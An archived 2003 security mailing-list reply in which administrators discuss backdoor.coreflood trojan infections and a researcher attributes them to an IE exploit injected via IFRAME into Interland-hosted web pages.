Re: Backdoor.coreflood infection

From: Jack McCarthy (lists_at_jackmccarthy.com)
Date: 09/05/03

  • Next message: Alfred Huger: "Voting on issues for this list and SecurityFocus (Incidents)"
    Date: Fri, 5 Sep 2003 10:53:25 -0700 (PDT)
    To: incidents@securityfocus.com
    
    

    Well, now that makes sense. My site is hosted by Interland and I saw strange
    traffic going to beech-info2.com when loading my page. I had about 10 other
    things on my plate at that time, so I didn't spend much time on it. We ended
    up having 2 infected machines, my box and our Citrix box, which I also use.
    Symantec corp edition found it (after the Sept 3 update) as backdoor.coreflood
    and deleted it. Any official postings/memos/news articles regarding this
    exploit on Interland's servers?

    -Jack

    --- Joe Stewart <jstewart@lurhq.com> wrote:
    > On Thursday 04 September 2003 02:05 pm, Reid Forrest wrote:
    > > We've had three machines across multiple sites come up
    > > with the backdoor.coreflood trojan today. NAV caught
    > > them all, but I'm wondering how it got in. We block
    > > .exe attachments.
    > >
    > > It's my understanding that this thing doesn't
    > > propagate itself. One instance I can understand, but
    > > three seemingly unrelated infections are puzzling.
    > >
    > > Is anyone else seeing this, or have any ideas?
    >
    > It sounds like your users visited a site hosted at Interland last week
    > and were hit by the IE exploit a hacker appended to the pages in an
    > IFRAME. The description as backdoor.coreflood is misleading; the
    > trojan you found was probably a proxy server, not an IRC bot. The
    > proxy server shares a lot of base code with the coreflood IRC bot
    > and uses the same style of DLL injection, but the functionality is
    > completely different.
    >
    > -Joe
    >
    > --
    > Joe Stewart, GCIH
    > Senior Security Researcher
    > LURHQ Corporation
    > http://www.lurhq.com/
    >
    >
    > ---------------------------------------------------------------------------
    > Attend Black Hat Briefings & Training Federal, September 29-30 (Training),
    > October 1-2 (Briefings) in Tysons Corner, VA; the world's premier
    > technical IT security event. Modeled after the famous Black Hat event in
    > Las Vegas! 6 tracks, 12 training sessions, top speakers and sponsors.
    > Symantec is the Diamond sponsor. Early-bird registration ends September
    > 6.Visit us: www.blackhat.com
    > ----------------------------------------------------------------------------
    >
    >
    >
    >

    ---------------------------------------------------------------------------
    Attend Black Hat Briefings & Training Federal, September 29-30 (Training),
    October 1-2 (Briefings) in Tysons Corner, VA; the world's premier
    technical IT security event. Modeled after the famous Black Hat event in
    Las Vegas! 6 tracks, 12 training sessions, top speakers and sponsors.
    Symantec is the Diamond sponsor. Early-bird registration ends September 6.Visit us: www.blackhat.com
    ----------------------------------------------------------------------------


  • Next message: Alfred Huger: "Voting on issues for this list and SecurityFocus (Incidents)"

    Relevant Pages

    • Re: Can anyone identify this possible backdoor?
      ... Attend Black Hat Briefings & Training Federal, September 29-30, ... Modeled after the famous Black Hat event in ... Symantec is the Diamond sponsor. ...
      (Incidents)
    • Re: Pen Test mistake
      ... Subject: Pen Test mistake ... Attend Black Hat Briefings & Training Federal, ... Modeled after the famous Black Hat event ... Symanetc is the Diamond sponsor. ...
      (Pen-Test)
    • RE: Re: Hunting for Mr Badmouth
      ... Attend Black Hat Briefings & Training Federal, ... Modeled after the famous Black Hat event ... Symantec is the Diamond sponsor. ... Attend Black Hat Briefings & Training Federal, September 29-30, ...
      (Security-Basics)
    • RE: Windows XP Pro cracker?
      ... Attend Black Hat Briefings & Training Federal, ... Modeled after the famous Black Hat event ... Symantec is the Diamond sponsor. ...
      (Security-Basics)
    • RE: Windows XP Pro cracker?
      ... Attend Black Hat Briefings & Training Federal, September 29-30, ... Modeled after the famous Black Hat event in ... Symantec is the Diamond sponsor. ...
      (Security-Basics)